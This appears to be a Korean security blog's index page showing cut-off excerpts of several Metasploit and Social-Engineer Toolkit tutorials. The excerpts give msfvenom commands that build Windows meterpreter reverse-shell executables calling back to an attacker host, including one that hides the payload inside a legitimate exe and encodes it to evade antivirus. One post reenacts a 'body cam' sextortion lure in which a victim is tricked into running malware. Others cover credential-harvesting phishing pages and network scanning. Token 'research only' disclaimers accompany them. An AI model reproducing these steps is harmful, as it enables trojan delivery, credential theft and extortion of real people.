Lucete

모든 책임은 사용자 본인에게 있습니다.먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러..

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다.먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다.그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.)그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/brows..

요즘 몸캠이 유행을 했었다.대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.)그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :)이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgres..

모든 사용의 법적 책임은 사용자 본인에게 있습니다.msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exeex) msfvenom -a x86 --platform windows -x file.exe -k -p ..

모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요.먼저 Kali linux or parrot linux에서 터미널을 opensetoolkit을 입력한다.입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다.다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 ..

postgreSQL???service postgresql start <= 이 명령어를 사용하면서 의문이 드는 사람이 많을 것이다.과연 ? 이명령어는 무엇일까?metasploit을 사용할 때 postgreSQL 쓰는 이유는 postgreSQL스캐너를 이용하여 postgreSQL 데이터베이스를 공격하기 위해 연동을 시켜주는 것이다.그럼 왜 postgreSQL을 쓸까?postgreSQL는 세계에서 가장 진보된 오픈..

포트스캐닝에 관한 이야기를 계속하겠습니다.앞에서 말한거와 같이 포트스캐닝에는 nmap 같이 유명한 도구가 있습니다.우리는 msf 보조기능을 이용해보겠습니다.1. use auxiliary/scanner/smb/smb_version2. set rhosts 192.168.32.0/24192.168.32.0/24를 이용해 대역을 스캔하는 것이다.3. set threads 256이러게 함으로 run을 할 수 있다.여기서 조금더 자세히 알고싶고 아이피를 안다면..

앞에의 글에서는 msfconsole 에서 company_name 을 이용해서 알아 보았다.이번에는 company_name 에서 알아낸 정보를 이용하여 보자.이를 이용하여 보자 .1. use auxiliary/gather/corpwatch_lookup_id이는 name 처럼 보조기능을 사용하는데 name 대신에 id를 이용하겠다는 것이다.2. set cw_id cw_40155이렇게 아이디를 지정하준다.3. set get_history true (tru..